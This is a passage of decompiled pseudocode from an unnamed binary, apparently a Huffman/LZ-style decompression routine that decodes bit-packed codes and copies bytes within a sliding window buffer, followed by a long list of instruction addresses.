                                                                                              																										if(_t461 < _v28) {
                                                                                              																											goto L15;
                                                                                              																										}
                                                                                              																										goto L9;
                                                                                              																									}
                                                                                              																									goto L102;
                                                                                              																								} while (_t512 == 0);
                                                                                              																								_t652 =  *(_t806 + 0x70);
                                                                                              																								_a4 = _t512;
                                                                                              																								_t514 = _t652 -  *((intOrPtr*)(_t806 + 0x54));
                                                                                              																								_t758 =  *((intOrPtr*)(_t806 + 0xe6d8)) + 0xffffefff;
                                                                                              																								_v24 = _t514;
                                                                                              																								__eflags = _t514 - _t758;
                                                                                              																								if(_t514 >= _t758) {
                                                                                              																									goto L121;
                                                                                              																								}
                                                                                              																								__eflags = _t652 - _t758;
                                                                                              																								if(_t652 >= _t758) {
                                                                                              																									goto L121;
                                                                                              																								}
                                                                                              																								_t761 =  *((intOrPtr*)(_t806 + 0x4b34));
                                                                                              																								_v12 = _t514 + _t761;
                                                                                              																								_t519 = _a4;
                                                                                              																								_t762 = _t761 + _t652;
                                                                                              																								_v8 = _t762;
                                                                                              																								 *(_t806 + 0x70) = _t652 + _t519;
                                                                                              																								__eflags =  *((intOrPtr*)(_t806 + 0x54)) - _t519;
                                                                                              																								if( *((intOrPtr*)(_t806 + 0x54)) >= _t519) {
                                                                                              																									__eflags = _t519 - 8;
                                                                                              																									if(_t519 < 8) {
                                                                                              																										goto L113;
                                                                                              																									}
                                                                                              																									_t520 = _t519 >> 3;
                                                                                              																									__eflags = _t520;
                                                                                              																									_v24 = _t520;
                                                                                              																									do {
                                                                                              																										E0041C290(_t608, _t806, _t808, _v8, _v12, 8);
                                                                                              																										_v12 = _v12 + 8;
                                                                                              																										_v8 = _v8 + 8;
                                                                                              																										_a4 = _a4 - 8;
                                                                                              																										_t810 = _t810 + 0xc;
                                                                                              																										_t307 =  &_v24;
                                                                                              																										 *_t307 = _v24 - 1;
                                                                                              																										__eflags =  *_t307;
                                                                                              																									} while ( *_t307 != 0);
                                                                                              																									goto L113;
                                                                                              																								}
                                                                                              																								__eflags = _t519 - 8;
                                                                                              																								if(_t519 < 8) {
                                                                                              																									goto L113;
                                                                                              																								}
                                                                                              																								_t522 = _t519 >> 3;
                                                                                              																								__eflags = _t522;
                                                                                              																								_v24 = _t522;
                                                                                              																								_t523 = _v12;
                                                                                              																								_t658 = _t762;
                                                                                              																								do {
                                                                                              																									_a4 = _a4 - 8;
                                                                                              																									 *_t658 =  *_t523;
                                                                                              																									 *((char*)(_t658 + 1)) =  *((intOrPtr*)(_t523 + 1));
                                                                                              																									 *((char*)(_t658 + 2)) =  *((intOrPtr*)(_t523 + 2));
                                                                                              																									 *((char*)(_t658 + 3)) =  *((intOrPtr*)(_t523 + 3));
                                                                                              																									 *((char*)(_t658 + 4)) =  *((intOrPtr*)(_t523 + 4));
                                                                                              																									 *((char*)(_t658 + 5)) =  *((intOrPtr*)(_t523 + 5));
                                                                                              																									 *((char*)(_t658 + 6)) =  *((intOrPtr*)(_t523 + 6));
                                                                                              																									 *((char*)(_t658 + 7)) =  *((intOrPtr*)(_t523 + 7));
                                                                                              																									_t523 = _t523 + 8;
                                                                                              																									_t658 = _t658 + 8;
                                                                                              																									_t294 =  &_v24;
                                                                                              																									 *_t294 = _v24 - 1;
                                                                                              																									__eflags =  *_t294;
                                                                                              																								} while ( *_t294 != 0);
                                                                                              																								L109:
                                                                                              																								_v8 = _t640;
                                                                                              																								_v12 = _t505;
                                                                                              																								goto L113;
                                                                                              																								L97:
                                                                                              																								_t528 = E00415771(_t806,  &_v52);
                                                                                              																								__eflags = _t528;
                                                                                              																							} while (_t528 != 0);
                                                                                              																							goto L98;
                                                                                              																							L121:
                                                                                              																							__eflags = _a4;
                                                                                              																						} while (_a4 <= 0);
                                                                                              																						_t759 =  *(_t806 + 0xe6dc);
                                                                                              																						do {
                                                                                              																							_a4 = _a4 - 1;
                                                                                              																							 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) =  *((intOrPtr*)((_t514 & _t759) +  *((intOrPtr*)(_t806 + 0x4b34))));
                                                                                              																							_t759 =  *(_t806 + 0xe6dc);
                                                                                              																							_t514 = _v24 + 1;
                                                                                              																							__eflags = _a4;
                                                                                              																							_v24 = _t514;
                                                                                              																							 *(_t806 + 0x70) =  *(_t806 + 0x70) + 0x00000001 & _t759;
                                                                                              																						} while (_a4 > 0);
                                                                                              																						goto L8;
                                                                                              																						L119:
                                                                                              																						__eflags = _a4 - 6;
                                                                                              																						 *((char*)(_t639 + 5)) =  *((intOrPtr*)(_v12 + 5));
                                                                                              																					} while (_a4 <= 6);
                                                                                              																					_t498 = _v12;
                                                                                              																					goto L90;
                                                                                              																				}
                                                                                              																				L114:
                                                                                              																				__eflags = _a4 - 1;
                                                                                              																				_t639 = _v8;
                                                                                              																				 *_t639 =  *_v12;
                                                                                              																			}
                                                                                              																			_t501 = _v20 >> 3;
                                                                                              																			__eflags = _t501;
                                                                                              																			_v24 = _t501;
                                                                                              																			do {
                                                                                              																				E0041C290(_t608, _t806, _t808, _v8, _v12, 8);
                                                                                              																				_v12 = _v12 + 8;
                                                                                              																				_v8 = _v8 + 8;
                                                                                              																				_a4 = _a4 - 8;
                                                                                              																				_t810 = _t810 + 0xc;
                                                                                              																				_t441 =  &_v24;
                                                                                              																				 *_t441 = _v24 - 1;
                                                                                              																				__eflags =  *_t441;
                                                                                              																			} while ( *_t441 != 0);
                                                                                              																			goto L113;
                                                                                              																		}
                                                                                              																		__eflags = _t481 - 8;
                                                                                              																		if(_t481 < 8) {
                                                                                              																			goto L113;
                                                                                              																		}
                                                                                              																		_t640 = _v8;
                                                                                              																		_t504 = _v20 >> 3;
                                                                                              																		__eflags = _t504;
                                                                                              																		_v24 = _t504;
                                                                                              																		_t505 = _v12;
                                                                                              																		do {
                                                                                              																			_a4 = _a4 - 8;
                                                                                              																			 *_t640 =  *_t505;
                                                                                              																			 *((char*)(_t640 + 1)) =  *((intOrPtr*)(_t505 + 1));
                                                                                              																			 *((char*)(_t640 + 2)) =  *((intOrPtr*)(_t505 + 2));
                                                                                              																			 *((char*)(_t640 + 3)) =  *((intOrPtr*)(_t505 + 3));
                                                                                              																			 *((char*)(_t640 + 4)) =  *((intOrPtr*)(_t505 + 4));
                                                                                              																			 *((char*)(_t640 + 5)) =  *((intOrPtr*)(_t505 + 5));
                                                                                              																			 *((char*)(_t640 + 6)) =  *((intOrPtr*)(_t505 + 6));
                                                                                              																			 *((char*)(_t640 + 7)) =  *((intOrPtr*)(_t505 + 7));
                                                                                              																			_t505 = _t505 + 8;
                                                                                              																			_t640 = _t640 + 8;
                                                                                              																			_t429 =  &_v24;
                                                                                              																			 *_t429 = _v24 - 1;
                                                                                              																			__eflags =  *_t429;
                                                                                              																		} while ( *_t429 != 0);
                                                                                              																		goto L109;
                                                                                              																	}
                                                                                              																}
                                                                                              																_t646 = _t608 + 0x2cf8 + _t733 * 4;
                                                                                              																while(1) {
                                                                                              																	__eflags = _t472 -  *_t646;
                                                                                              																	if(_t472 <  *_t646) {
                                                                                              																		break;
                                                                                              																	}
                                                                                              																	_t733 = _t733 + 1;
                                                                                              																	_t646 = _t646 + 4;
                                                                                              																	__eflags = _t733 - 0xf;
                                                                                              																	if(_t733 < 0xf) {
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	goto L135;
                                                                                              																}
                                                                                              																_a4 = _t733;
                                                                                              																goto L135;
                                                                                              															}
                                                                                              															_t647 = 0x10;
                                                                                              															_t511 = _t472 >> _t647 - _t732;
                                                                                              															_t650 = ( *(_t511 + _t608 + 0x2d7c) & 0x000000ff) +  *(_t808 + 4);
                                                                                              															 *_t808 =  *_t808 + (_t650 >> 3);
                                                                                              															 *(_t808 + 4) = _t650 & 0x00000007;
                                                                                              															_t476 =  *(_t608 + 0x317c + _t511 * 2) & 0x0000ffff;
                                                                                              															goto L138;
                                                                                              														} else {
                                                                                              															goto L126;
                                                                                              														}
                                                                                              														do {
                                                                                              															L126:
                                                                                              															 *_t622 =  *((intOrPtr*)(_t622 - 4));
                                                                                              															_t469 = _t469 - 1;
                                                                                              															_t622 = _t622 - 4;
                                                                                              															__eflags = _t469;
                                                                                              														} while (_t469 > 0);
                                                                                              														goto L127;
                                                                                              													}
                                                                                              													L102:
                                                                                              													_t512 =  *(_t806 + 0x68);
                                                                                              													__eflags = _t512;
                                                                                              												}
                                                                                              												_push( &_v52);
                                                                                              												_t525 = E00414290(_t806, _t808);
                                                                                              												__eflags = _t525;
                                                                                              												if(_t525 == 0) {
                                                                                              													goto L98;
                                                                                              												}
                                                                                              												goto L97;
                                                                                              											}
                                                                                              											_t529 = _t468 + 0xfffffefa;
                                                                                              											__eflags = _t529 - 8;
                                                                                              											if(_t529 >= 8) {
                                                                                              												_t663 = (_t529 >> 2) - 1;
                                                                                              												_a4 = _t663;
                                                                                              												_v12 = ((_t529 & 0x00000003 | 0x00000004) << _t663) + 2;
                                                                                              												__eflags = _t663;
                                                                                              												if(_t663 > 0) {
                                                                                              													_t594 = E0040978C(_t808);
                                                                                              													_t711 = 0x10;
                                                                                              													_v12 = _v12 + (_t594 >> _t711 - _a4);
                                                                                              													_t597 =  *(_t808 + 4) + _a4;
                                                                                              													 *_t808 =  *_t808 + (_t597 >> 3);
                                                                                              													_t598 = _t597 & 0x00000007;
                                                                                              													__eflags = _t598;
                                                                                              													 *(_t808 + 4) = _t598;
                                                                                              												}
                                                                                              											} else {
                                                                                              												_v12 = _t529 + 2;
                                                                                              											}
                                                                                              											_v16 = _v12;
                                                                                              											_t536 = E0040978C(_t808);
                                                                                              											_t771 =  *(_t608 + 0xfa0);
                                                                                              											_t537 = _t536 & 0x0000fffe;
                                                                                              											__eflags = _t537 -  *((intOrPtr*)(_t608 + 0xf20 + _t771 * 4));
                                                                                              											if(_t537 >=  *((intOrPtr*)(_t608 + 0xf20 + _t771 * 4))) {
                                                                                              												_t772 = _t771 + 1;
                                                                                              												_a4 = 0xf;
                                                                                              												__eflags = _t772 - 0xf;
                                                                                              												if(_t772 >= 0xf) {
                                                                                              													L46:
                                                                                              													_t666 =  *(_t808 + 4) + _a4;
                                                                                              													 *_t808 =  *_t808 + (_t666 >> 3);
                                                                                              													_t775 = _a4;
                                                                                              													 *(_t808 + 4) = _t666 & 0x00000007;
                                                                                              													_t668 = 0x10;
                                                                                              													_t540 = (_t537 -  *((intOrPtr*)(_t608 + 0xf1c + _a4 * 4)) >> _t668 - _a4) +  *((intOrPtr*)(_t608 + 0xf60 + _t775 * 4));
                                                                                              													__eflags = _t540 -  *((intOrPtr*)(_t608 + 0xf1c));
                                                                                              													if(_t540 >=  *((intOrPtr*)(_t608 + 0xf1c))) {
                                                                                              														_t540 = 0;
                                                                                              														__eflags = 0;
                                                                                              													}
                                                                                              													_t541 =  *(_t608 + 0x1ba4 + _t540 * 2) & 0x0000ffff;
                                                                                              													goto L49;
                                                                                              												}
                                                                                              												_t704 = _t608 + 0xf20 + _t772 * 4;
                                                                                              												while(1) {
                                                                                              													__eflags = _t537 -  *_t704;
                                                                                              													if(_t537 <  *_t704) {
                                                                                              														break;
                                                                                              													}
                                                                                              													_t772 = _t772 + 1;
                                                                                              													_t704 = _t704 + 4;
                                                                                              													__eflags = _t772 - 0xf;
                                                                                              													if(_t772 < 0xf) {
                                                                                              														continue;
                                                                                              													}
                                                                                              													goto L46;
                                                                                              												}
                                                                                              												_a4 = _t772;
                                                                                              												goto L46;
                                                                                              											} else {
                                                                                              												_t705 = 0x10;
                                                                                              												_t593 = _t537 >> _t705 - _t771;
                                                                                              												_t708 = ( *(_t593 + _t608 + 0xfa4) & 0x000000ff) +  *(_t808 + 4);
                                                                                              												 *_t808 =  *_t808 + (_t708 >> 3);
                                                                                              												 *(_t808 + 4) = _t708 & 0x00000007;
                                                                                              												_t541 =  *(_t608 + 0x13a4 + _t593 * 2) & 0x0000ffff;
                                                                                              												L49:
                                                                                              												__eflags = _t541 - 4;
                                                                                              												if(_t541 >= 4) {
                                                                                              													_t672 = (_t541 >> 1) - 1;
                                                                                              													_a4 = _t672;
                                                                                              													_v20 = ((_t541 & 0x00000001 | 0x00000002) << _t672) + 1;
                                                                                              													__eflags = _t672;
                                                                                              													if(_t672 <= 0) {
                                                                                              														L68:
                                                                                              														_t776 = _v20;
                                                                                              														__eflags = _t776 - 0x100;
                                                                                              														if(_t776 > 0x100) {
                                                                                              															_v16 = _v12 + 1;
                                                                                              															__eflags = _t776 - 0x2000;
                                                                                              															if(_t776 > 0x2000) {
                                                                                              																_v16 = _v16 + 1;
                                                                                              																__eflags = _t776 - 0x40000;
                                                                                              																if(_t776 > 0x40000) {
                                                                                              																	_t166 =  &_v16;
                                                                                              																	 *_t166 = _v16 + 1;
                                                                                              																	__eflags =  *_t166;
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              														 *((intOrPtr*)(_t806 + 0x60)) =  *((intOrPtr*)(_t806 + 0x5c));
                                                                                              														 *((intOrPtr*)(_t806 + 0x5c)) =  *((intOrPtr*)(_t806 + 0x58));
                                                                                              														 *((intOrPtr*)(_t806 + 0x58)) =  *((intOrPtr*)(_t806 + 0x54));
                                                                                              														_t549 = _v16;
                                                                                              														 *(_t806 + 0x68) = _t549;
                                                                                              														_a4 = _t549;
                                                                                              														_t550 =  *(_t806 + 0x70);
                                                                                              														_t674 = _t550 - _t776;
                                                                                              														 *((intOrPtr*)(_t806 + 0x54)) = _t776;
                                                                                              														_t778 =  *((intOrPtr*)(_t806 + 0xe6d8)) + 0xffffefff;
                                                                                              														_v24 = _t674;
                                                                                              														__eflags = _t674 - _t778;
                                                                                              														if(_t674 >= _t778) {
                                                                                              															goto L91;
                                                                                              														} else {
                                                                                              															__eflags = _t550 - _t778;
                                                                                              															if(_t550 >= _t778) {
                                                                                              																goto L91;
                                                                                              															}
                                                                                              															_t781 =  *((intOrPtr*)(_t806 + 0x4b34));
                                                                                              															_v8 = _t674 + _t781;
                                                                                              															_t679 = _v16;
                                                                                              															_t782 = _t781 + _t550;
                                                                                              															_v12 = _t782;
                                                                                              															 *(_t806 + 0x70) = _t550 + _t679;
                                                                                              															__eflags = _v20 - _t679;
                                                                                              															if(_v20 >= _t679) {
                                                                                              																__eflags = _t679 - 8;
                                                                                              																if(_t679 < 8) {
                                                                                              																	goto L82;
                                                                                              																}
                                                                                              																_t569 = _v16 >> 3;
                                                                                              																__eflags = _t569;
                                                                                              																_v24 = _t569;
                                                                                              																do {
                                                                                              																	E0041C290(_t608, _t806, _t808, _v12, _v8, 8);
                                                                                              																	_v8 = _v8 + 8;
                                                                                              																	_v12 = _v12 + 8;
                                                                                              																	_a4 = _a4 - 8;
                                                                                              																	_t810 = _t810 + 0xc;
                                                                                              																	_t219 =  &_v24;
                                                                                              																	 *_t219 = _v24 - 1;
                                                                                              																	__eflags =  *_t219;
                                                                                              																} while ( *_t219 != 0);
                                                                                              																goto L82;
                                                                                              															}
                                                                                              															__eflags = _t679 - 8;
                                                                                              															if(_t679 < 8) {
                                                                                              																goto L82;
                                                                                              															}
                                                                                              															_t572 = _t679 >> 3;
                                                                                              															__eflags = _t572;
                                                                                              															_v24 = _t572;
                                                                                              															_t573 = _v8;
                                                                                              															_t680 = _t782;
                                                                                              															do {
                                                                                              																_a4 = _a4 - 8;
                                                                                              																 *_t680 =  *_t573;
                                                                                              																_t191 = _t573 + 1; // 0x300905a
                                                                                              																 *((char*)(_t680 + 1)) =  *_t191;
                                                                                              																_t193 = _t573 + 2; // 0x30090
                                                                                              																 *((char*)(_t680 + 2)) =  *_t193;
                                                                                              																_t195 = _t573 + 3; // 0x300
                                                                                              																 *((char*)(_t680 + 3)) =  *_t195;
                                                                                              																_t197 = _t573 + 4; // 0x3
                                                                                              																 *((char*)(_t680 + 4)) =  *_t197;
                                                                                              																_t199 = _t573 + 5; // 0x4000000
                                                                                              																 *((char*)(_t680 + 5)) =  *_t199;
                                                                                              																_t201 = _t573 + 6; // 0x40000
                                                                                              																 *((char*)(_t680 + 6)) =  *_t201;
                                                                                              																_t203 = _t573 + 7; // 0x400
                                                                                              																 *((char*)(_t680 + 7)) =  *_t203;
                                                                                              																_t573 = _t573 + 8;
                                                                                              																_t680 = _t680 + 8;
                                                                                              																_t205 =  &_v24;
                                                                                              																 *_t205 = _v24 - 1;
                                                                                              																__eflags =  *_t205;
                                                                                              															} while ( *_t205 != 0);
                                                                                              															_v12 = _t680;
                                                                                              															_v8 = _t573;
                                                                                              															goto L82;
                                                                                              														}
                                                                                              													}
                                                                                              													__eflags = _t672 - 4;
                                                                                              													if(__eflags < 0) {
                                                                                              														_t576 = E00412AEB(_t808);
                                                                                              														_t682 = 0x20;
                                                                                              														_v20 = _v20 + (_t576 >> _t682 - _a4);
                                                                                              														_t579 =  *(_t808 + 4) + _a4;
                                                                                              														 *_t808 =  *_t808 + (_t579 >> 3);
                                                                                              														_t580 = _t579 & 0x00000007;
                                                                                              														__eflags = _t580;
                                                                                              														 *(_t808 + 4) = _t580;
                                                                                              														goto L68;
                                                                                              													}
                                                                                              													if(__eflags > 0) {
                                                                                              														_t588 = E00412AEB(_t808);
                                                                                              														_t589 = _a4;
                                                                                              														_t699 = 0x24;
                                                                                              														_t590 = _t589 +  *(_t808 + 4) - 4;
                                                                                              														_v20 = _v20 + (_t588 >> _t699 - _t589 << 4);
                                                                                              														 *_t808 =  *_t808 + (_t590 >> 3);
                                                                                              														_t591 = _t590 & 0x00000007;
                                                                                              														__eflags = _t591;
                                                                                              														 *(_t808 + 4) = _t591;
                                                                                              													}
                                                                                              													_t581 = E0040978C(_t808);
                                                                                              													_t791 =  *(_t608 + 0x1e8c);
                                                                                              													_t582 = _t581 & 0x0000fffe;
                                                                                              													__eflags = _t582 -  *((intOrPtr*)(_t608 + 0x1e0c + _t791 * 4));
                                                                                              													if(_t582 >=  *((intOrPtr*)(_t608 + 0x1e0c + _t791 * 4))) {
                                                                                              														_t792 = _t791 + 1;
                                                                                              														_a4 = 0xf;
                                                                                              														__eflags = _t792 - 0xf;
                                                                                              														if(_t792 >= 0xf) {
                                                                                              															L63:
                                                                                              															_t688 =  *(_t808 + 4) + _a4;
                                                                                              															 *_t808 =  *_t808 + (_t688 >> 3);
                                                                                              															_t795 = _a4;
                                                                                              															 *(_t808 + 4) = _t688 & 0x00000007;
                                                                                              															_t690 = 0x10;
                                                                                              															_t585 = (_t582 -  *((intOrPtr*)(_t608 + 0x1e08 + _a4 * 4)) >> _t690 - _a4) +  *((intOrPtr*)(_t608 + 0x1e4c + _t795 * 4));
                                                                                              															__eflags = _t585 -  *((intOrPtr*)(_t608 + 0x1e08));
                                                                                              															if(_t585 >=  *((intOrPtr*)(_t608 + 0x1e08))) {
                                                                                              																_t585 = 0;
                                                                                              																__eflags = 0;
                                                                                              															}
                                                                                              															_t586 =  *(_t608 + 0x2a90 + _t585 * 2) & 0x0000ffff;
                                                                                              															goto L66;
                                                                                              														}
                                                                                              														_t692 = _t608 + 0x1e0c + _t792 * 4;
                                                                                              														while(1) {
                                                                                              															__eflags = _t582 -  *_t692;
                                                                                              															if(_t582 <  *_t692) {
                                                                                              																break;
                                                                                              															}
                                                                                              															_t792 = _t792 + 1;
                                                                                              															_t692 = _t692 + 4;
                                                                                              															__eflags = _t792 - 0xf;
                                                                                              															if(_t792 < 0xf) {
                                                                                              																continue;
                                                                                              															}
                                                                                              															goto L63;
                                                                                              														}
                                                                                              														_a4 = _t792;
                                                                                              														goto L63;
                                                                                              													} else {
                                                                                              														_t693 = 0x10;
                                                                                              														_t587 = _t582 >> _t693 - _t791;
                                                                                              														_t696 = ( *(_t587 + _t608 + 0x1e90) & 0x000000ff) +  *(_t808 + 4);
                                                                                              														 *_t808 =  *_t808 + (_t696 >> 3);
                                                                                              														 *(_t808 + 4) = _t696 & 0x00000007;
                                                                                              														_t586 =  *(_t608 + 0x2290 + _t587 * 2) & 0x0000ffff;
                                                                                              														L66:
                                                                                              														_v20 = _v20 + _t586;
                                                                                              														goto L68;
                                                                                              													}
                                                                                              												}
                                                                                              												_v20 = _t541 + 1;
                                                                                              												goto L68;
                                                                                              											}
                                                                                              										}
                                                                                              										 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) = _t468;
                                                                                              										 *(_t806 + 0x70) =  *(_t806 + 0x70) + 1;
                                                                                              										continue;
                                                                                              									}
                                                                                              									_t716 = _t608 + 0x34 + _t727 * 4;
                                                                                              									while(1) {
                                                                                              										__eflags = _t464 -  *_t716;
                                                                                              										if(_t464 <  *_t716) {
                                                                                              											break;
                                                                                              										}
                                                                                              										_t727 = _t727 + 1;
                                                                                              										_t716 = _t716 + 4;
                                                                                              										__eflags = _t727 - 0xf;
                                                                                              										if(_t727 < 0xf) {
                                                                                              											continue;
                                                                                              										}
                                                                                              										goto L28;
                                                                                              									}
                                                                                              									_a4 = _t727;
                                                                                              									goto L28;
                                                                                              								}
                                                                                              								_t717 = 0x10;
                                                                                              								_t600 = _t464 >> _t717 - _t726;
                                                                                              								_t720 = ( *(_t600 + _t608 + 0xb8) & 0x000000ff) +  *(_t808 + 4);
                                                                                              								 *_t808 =  *_t808 + (_t720 >> 3);
                                                                                              								 *(_t808 + 4) = _t720 & 0x00000007;
                                                                                              								_t468 =  *(_t608 + 0x4b8 + _t600 * 2) & 0x0000ffff;
                                                                                              								goto L31;
                                                                                              							}
                                                                                              							__eflags =  *((intOrPtr*)(_t806 + 0x4b30)) - _t462;
                                                                                              							if( *((intOrPtr*)(_t806 + 0x4b30)) == _t462) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							E00415346(_t806);
                                                                                              							__eflags =  *((intOrPtr*)(_t806 + 0x4c54)) -  *((intOrPtr*)(_t806 + 0x4c44));
                                                                                              							if(__eflags > 0) {
                                                                                              								goto L5;
                                                                                              							}
                                                                                              							if(__eflags < 0) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							__eflags =  *((intOrPtr*)(_t806 + 0x4c50)) -  *((intOrPtr*)(_t806 + 0x4c40));
                                                                                              							if( *((intOrPtr*)(_t806 + 0x4c50)) >  *((intOrPtr*)(_t806 + 0x4c40))) {
                                                                                              								goto L5;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              						}
                                                                                              					} else {
                                                                                              						 *((char*)(_t608 + 0x4ad0)) = 1;
                                                                                              						L5:
                                                                                              						_t526 = 0;
                                                                                              						L99:
                                                                                              						return _t526;
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *((char*)(_t608 + 0x2c)) = 1;
                                                                                              					_t607 = E0041462B(_t608, __ecx, _t608 + 4, _t608 + 0x18, _t608 + 0x30);
                                                                                              					if(_t607 != 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						 *((char*)(_t608 + 0x4ad0)) = 1;
                                                                                              						return _t607;
                                                                                              					}
                                                                                              				}
                                                                                              			}









































































































































                                                                                              0x00415da1
                                                                                              0x00415da9
                                                                                              0x00415dab
                                                                                              0x00415dd2
                                                                                              0x00415dd2
                                                                                              0x00415dd9
                                                                                              0x00415dde
                                                                                              0x00415de0
                                                                                              0x00415df3
                                                                                              0x00415dfd
                                                                                              0x00415e00
                                                                                              0x00415e02
                                                                                              0x00415e05
                                                                                              0x00415e08
                                                                                              0x00415e0b
                                                                                              0x00415e0d
                                                                                              0x00415e0d
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e16
                                                                                              0x00415e19
                                                                                              0x00415e1b
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e20
                                                                                              0x00415e20
                                                                                              0x00415e23
                                                                                              0x0041639a
                                                                                              0x0041639a
                                                                                              0x00000000
                                                                                              0x0041639a
                                                                                              0x00415e29
                                                                                              0x00415e37
                                                                                              0x00415e37
                                                                                              0x00415e3a
                                                                                              0x00415e49
                                                                                              0x00415e49
                                                                                              0x00415e4f
                                                                                              0x00416784
                                                                                              0x00416784
                                                                                              0x00000000
                                                                                              0x00416784
                                                                                              0x00000000
                                                                                              0x00415e4f
                                                                                              0x00415e3c
                                                                                              0x00415e43
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e43
                                                                                              0x00415e2e
                                                                                              0x00415e31
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e55
                                                                                              0x00415e5b
                                                                                              0x00415e62
                                                                                              0x00415e68
                                                                                              0x00415e9f
                                                                                              0x00415ea1
                                                                                              0x00415ea6
                                                                                              0x00415eac
                                                                                              0x00415eb1
                                                                                              0x00415eb5
                                                                                              0x00415ee0
                                                                                              0x00415ee1
                                                                                              0x00415ee8
                                                                                              0x00415eeb
                                                                                              0x00415f03
                                                                                              0x00415f06
                                                                                              0x00415f10
                                                                                              0x00415f12
                                                                                              0x00415f18
                                                                                              0x00415f1f
                                                                                              0x00415f24
                                                                                              0x00415f28
                                                                                              0x00415f2b
                                                                                              0x00415f2d
                                                                                              0x00415f2d
                                                                                              0x00415f2d
                                                                                              0x00415f2f
                                                                                              0x00415f37
                                                                                              0x00415f3c
                                                                                              0x00415f3e
                                                                                              0x00415f54
                                                                                              0x00415f59
                                                                                              0x00416373
                                                                                              0x00416375
                                                                                              0x004163a3
                                                                                              0x004163a8
                                                                                              0x0041654d
                                                                                              0x0041654d
                                                                                              0x00416552
                                                                                              0x00416558
                                                                                              0x0041655b
                                                                                              0x0041656a
                                                                                              0x0041656f
                                                                                              0x00416572
                                                                                              0x00416577
                                                                                              0x0041657d
                                                                                              0x00416582
                                                                                              0x00416589
                                                                                              0x004165b4
                                                                                              0x004165b5
                                                                                              0x004165bc
                                                                                              0x004165bf
                                                                                              0x004165da
                                                                                              0x004165dd
                                                                                              0x004165e7
                                                                                              0x004165e9
                                                                                              0x004165ef
                                                                                              0x004165f9
                                                                                              0x004165fe
                                                                                              0x00416605
                                                                                              0x0041660b
                                                                                              0x0041660d
                                                                                              0x0041660d
                                                                                              0x0041660d
                                                                                              0x0041660f
                                                                                              0x00416617
                                                                                              0x00416617
                                                                                              0x0041661a
                                                                                              0x0041662c
                                                                                              0x00416632
                                                                                              0x00416636
                                                                                              0x00416637
                                                                                              0x0041663a
                                                                                              0x0041663c
                                                                                              0x00416640
                                                                                              0x00416647
                                                                                              0x0041664d
                                                                                              0x00416653
                                                                                              0x0041665b
                                                                                              0x0041665d
                                                                                              0x0041665d
                                                                                              0x00416660
                                                                                              0x00416663
                                                                                              0x00416663
                                                                                              0x0041661c
                                                                                              0x0041661c
                                                                                              0x0041661f
                                                                                              0x0041661f
                                                                                              0x00416669
                                                                                              0x00416672
                                                                                              0x00416678
                                                                                              0x0041667b
                                                                                              0x0041667e
                                                                                              0x00416681
                                                                                              0x00416683
                                                                                              0x00416742
                                                                                              0x00416742
                                                                                              0x00416689
                                                                                              0x00416689
                                                                                              0x0041668c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416692
                                                                                              0x0041669a
                                                                                              0x0041669d
                                                                                              0x004166a2
                                                                                              0x004166a8
                                                                                              0x004166ab
                                                                                              0x004166ae
                                                                                              0x0041670a
                                                                                              0x0041670d
                                                                                              0x00416483
                                                                                              0x00416483
                                                                                              0x00416487
                                                                                              0x00000000
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e16
                                                                                              0x00415e19
                                                                                              0x00415e1b
                                                                                              0x00415e1e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00415e1e
                                                                                              0x004162a3
                                                                                              0x004162a3
                                                                                              0x004162a3
                                                                                              0x00000000
                                                                                              0x00415e10
                                                                                              0x00000000
                                                                                              0x004162ad
                                                                                              0x004162ad
                                                                                              0x004162b6
                                                                                              0x004162b9
                                                                                              0x004162b9
                                                                                              0x00000000
                                                                                              0x00415e10
                                                                                              0x00000000
                                                                                              0x004162c1
                                                                                              0x004162c1
                                                                                              0x004162c8
                                                                                              0x004162cb
                                                                                              0x004162cb
                                                                                              0x00000000
                                                                                              0x004164a1
                                                                                              0x004164a1
                                                                                              0x004164ab
                                                                                              0x004164ab
                                                                                              0x00000000
                                                                                              0x004162d4
                                                                                              0x004162d4
                                                                                              0x004162db
                                                                                              0x004162de
                                                                                              0x004162de
                                                                                              0x00000000
                                                                                              0x004164b4
                                                                                              0x004164b4
                                                                                              0x004164be
                                                                                              0x004164be
                                                                                              0x00000000
                                                                                              0x004162e7
                                                                                              0x004162e7
                                                                                              0x004162ee
                                                                                              0x004162f1
                                                                                              0x004162f1
                                                                                              0x00000000
                                                                                              0x004164c7
                                                                                              0x004164c7
                                                                                              0x004164d1
                                                                                              0x004164d1
                                                                                              0x00000000
                                                                                              0x004162fa
                                                                                              0x004162fa
                                                                                              0x00416301
                                                                                              0x00416304
                                                                                              0x00416304
                                                                                              0x00000000
                                                                                              0x004164da
                                                                                              0x004164da
                                                                                              0x004164e4
                                                                                              0x004164e4
                                                                                              0x00000000
                                                                                              0x0041630d
                                                                                              0x0041630d
                                                                                              0x00416314
                                                                                              0x00416317
                                                                                              0x00416317
                                                                                              0x00416320
                                                                                              0x00416323
                                                                                              0x00416323
                                                                                              0x00416326
                                                                                              0x00416329
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e10
                                                                                              0x00415e16
                                                                                              0x00415e19
